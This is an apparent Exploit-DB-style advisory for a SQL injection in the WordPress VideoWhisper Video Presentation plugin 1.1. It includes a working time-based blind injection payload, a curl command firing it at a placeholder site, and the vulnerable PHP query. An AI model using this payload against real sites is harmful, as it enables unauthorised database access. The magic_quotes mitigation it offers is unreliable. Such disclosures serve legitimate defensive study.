WordPress VideoWhisper Video Presentation plugin

vendor:

Video Presentation plugin

by:

Miroslav Stampar

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Video Presentation plugin

Affected Version From: <= 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE:

CPE: a:videowhisper:video_presentation:1.1

Metasploit:

Other Scripts:

Platforms Tested: WordPress

2011

WordPress VideoWhisper Video Presentation plugin <= 1.1 SQL Injection Vulnerability

The WordPress VideoWhisper Video Presentation plugin version 1.1 is vulnerable to SQL Injection. The 's' parameter in the 'c_status.php' file is not properly sanitized, allowing an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can execute arbitrary SQL queries, potentially gaining unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to update the plugin to the latest version. Additionally, enabling magic_quotes can provide some protection against SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: WordPress VideoWhisper Video Presentation plugin <= 1.1 SQL Injection Vulnerability
# Date: 2011-09-02
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/videowhisper-video-presentation.zip
# Version: 1.1 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/c_status.php
 s=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

e.g.:
curl --data "s=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/c_status.php

---------------
Vulnerable code
---------------
$s=$_POST['s'];
...
$sql = "SELECT * FROM $table_name where session='$s' and status='1'";
$session = $wpdb->get_row($sql);